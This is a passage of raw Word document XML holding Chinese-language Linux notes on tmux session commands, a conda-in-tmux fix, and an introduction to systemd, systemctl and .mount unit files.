    </w:p>
    <w:p w14:paraId="2E7CDCB6" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ tmux attach -t &lt;session-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072C0DFC" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:r>
        <w:t>杀死会话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4021242F" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tmux kill-session</w:t>
      </w:r>
      <w:r>
        <w:t>命令用于杀死某个会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5275FC49" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>使用会话编号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135C54DD" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ tmux kill-session -t 0# </w:t>
      </w:r>
      <w:r>
        <w:t>使用会话名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58305BAE" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ tmux kill-session -t &lt;session-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A014B" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.5 </w:t>
      </w:r>
      <w:r>
        <w:t>切换会话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16508758" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>tmux switch</w:t>
      </w:r>
      <w:r>
        <w:t>命令用于切换会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A65006E" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:t>使用会话编号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE3E0B" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ tmux switch -t 0# </w:t>
      </w:r>
      <w:r>
        <w:t>使用会话名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262F3425" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ tmux switch -t &lt;session-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF02490" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6 </w:t>
      </w:r>
      <w:r>
        <w:t>重命名会话</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7A033" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>tmux rename-session</w:t>
      </w:r>
      <w:r>
        <w:t>命令用于重命名会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D898FFC" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>$ tmux rename-session -t 0 &lt;new-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716566A6" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>上面命令将</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>号会话重命名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1FDFAC" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.7 </w:t>
      </w:r>
      <w:r>
        <w:t>会话快捷键</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D49C95" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>下面是一些会话相关的快捷键。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E87C476" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>Ctrl+b d</w:t>
      </w:r>
      <w:r>
        <w:t>：分离当前会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1988D5E3" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>Ctrl+b s</w:t>
      </w:r>
      <w:r>
        <w:t>：列出所有会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318211F9" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>、最简操作流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F8533F" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>以下是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tmux </w:t>
      </w:r>
      <w:r>
        <w:t>的最简操作流程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029E9745" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>新建会话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>tmux new -s my_session</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191DDD74" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tmux </w:t>
      </w:r>
      <w:r>
        <w:t>窗口运行所需的程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C56524" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>按下快捷键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>Ctrl+b d</w:t>
      </w:r>
      <w:r>
        <w:t>将会话分离。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C5D0D3" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>下次使用时，重新连接到会话</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>tmux attach -t my_session</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8F1B8" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8DC2C3" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>、高级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B757F0B" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>窗格切割，窗口切换，这些不多介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7597986B" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53BF2F64" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>、注意事项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6889E62B" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 conda </w:t>
      </w:r>
      <w:r>
        <w:t>依赖丢失问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4FED78" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>在使用</w:t>
      </w:r>
      <w:r>
        <w:t>tmux</w:t>
      </w:r>
      <w:r>
        <w:t>来新建会话时，在进入会话后会发现即使使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E55D302" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>source activate ***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8CD954" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>来激活</w:t>
      </w:r>
      <w:r>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:t>的虚拟环境，也无法正常的使用环境中安装的各种包，会提示</w:t>
      </w:r>
      <w:r>
        <w:t>“No module named ‘***’”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7A510B" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>这种情况的原因是在</w:t>
      </w:r>
      <w:r>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:t>的虚拟环境下使用了</w:t>
      </w:r>
      <w:r>
        <w:t>tmux</w:t>
      </w:r>
      <w:r>
        <w:t>导致配置错误。解决方法是退出</w:t>
      </w:r>
      <w:r>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:t>的虚拟环境使用</w:t>
      </w:r>
      <w:r>
        <w:t>tmux</w:t>
      </w:r>
      <w:r>
        <w:t>命令。这样</w:t>
      </w:r>
      <w:r>
        <w:t>tmux</w:t>
      </w:r>
      <w:r>
        <w:t>的会话中可以正常进入</w:t>
      </w:r>
      <w:r>
        <w:t>conda</w:t>
      </w:r>
      <w:r>
        <w:t>的虚拟环境并使用各种包了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0283F18F" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD6B745" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>、参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A418E03" w14:textId="77777777" w:rsidR="00B035B5" w:rsidRDefault="00B035B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://www.ruanyifeng.com/blog/2019/10/tmux.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E78A0" w14:textId="77777777" w:rsidR="002710EC" w:rsidRPr="00B035B5" w:rsidRDefault="002710EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BF879A" w14:textId="77777777" w:rsidR="002710EC" w:rsidRDefault="002710EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42CF8C25" w14:textId="77777777" w:rsidR="002710EC" w:rsidRDefault="002710EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5034ABE5" w14:textId="77777777" w:rsidR="002710EC" w:rsidRDefault="002710EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D2BF185" w14:textId="5952A789" w:rsidR="00BA3A23" w:rsidRDefault="00412700" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="226" w:name="_Toc159779686"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>开机自启动</w:t>
      </w:r>
      <w:r w:rsidR="00384EE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00384EE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00384EE1">
        <w:t>ystemctl</w:t>
      </w:r>
      <w:r w:rsidR="00384EE1">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00384EE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00384EE1">
        <w:t>ervice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="226"/>
    </w:p>
    <w:p w14:paraId="4831A811" w14:textId="77777777" w:rsidR="00700DC5" w:rsidRDefault="00700DC5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AE92A98" w14:textId="67552321" w:rsidR="00C85BE5" w:rsidRDefault="00C85BE5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务管理两种方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E13F437" w14:textId="77777777" w:rsidR="00C85BE5" w:rsidRDefault="00C85BE5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E8CCA82" w14:textId="77777777" w:rsidR="00C85BE5" w:rsidRDefault="00C85BE5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统最新的初始化系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(init),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作用是提高系统的启动速度，尽可能启动较少的进程，尽可能更多进程并发启动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A419F9E" w14:textId="77777777" w:rsidR="00C85BE5" w:rsidRDefault="00C85BE5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677B1AD8" w14:textId="62952153" w:rsidR="00BA3A23" w:rsidRDefault="00C85BE5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对应的进程管理命令是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C024417" w14:textId="2FC191DF" w:rsidR="00BA3A23" w:rsidRPr="00751E84" w:rsidRDefault="0030686F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00751E84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:r w:rsidRPr="00751E84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>命令兼容了</w:t>
      </w:r>
      <w:r w:rsidRPr="00751E84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidRPr="00751E84">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00751E84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:r w:rsidRPr="00751E84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>也会去</w:t>
      </w:r>
      <w:r w:rsidRPr="00751E84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/etc/init.d</w:t>
      </w:r>
      <w:r w:rsidRPr="00751E84">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>目录下，查看，执行相关程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1189EBF6" w14:textId="732DE9B2" w:rsidR="00C85BE5" w:rsidRDefault="00C85BE5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436B4DBF" w14:textId="41610586" w:rsidR="00C85BE5" w:rsidRDefault="00C85BE5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61243358" w14:textId="11A68751" w:rsidR="00EB5BB0" w:rsidRDefault="00CA4BDC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>开机自启动的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>unit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D16D901" w14:textId="636C9655" w:rsidR="00CA4BDC" w:rsidRDefault="00CA4BDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA4BDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4BDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令管理</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4BDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4BDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4BDC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728107CB" w14:textId="77777777" w:rsidR="00CA4BDC" w:rsidRPr="00CA4BDC" w:rsidRDefault="00CA4BDC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421DB840" w14:textId="44D29D19" w:rsidR="00072009" w:rsidRDefault="00EB5BB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>systemd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Unit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放在目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/usr/lib/systemd/system(Centos)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/etc/systemd/system(Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A21FDE7" w14:textId="0A9DF5A6" w:rsidR="00072009" w:rsidRDefault="00E20B42" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E20B42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要有四种类型文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E20B42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.mount,.service,.target,.wants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADA927D" w14:textId="77777777" w:rsidR="00072009" w:rsidRPr="00072009" w:rsidRDefault="00072009" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D34D7F" w14:textId="5F8E059C" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007B7764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.mount</w:t>
      </w:r>
      <w:r w:rsidRPr="007B7764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54494AD8" w14:textId="667A0930" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.mount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件定义了一个挂载点，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[Mount]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节点里配置了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>What,Where,Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三个数据项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4BB05" w14:textId="72BF5645" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等同于以下命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B47E621" w14:textId="6A491705" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mount -t hugetlbfs /dev/hugepages hugetlbfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110514F4" w14:textId="77777777" w:rsidR="0023120D" w:rsidRDefault="0023120D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
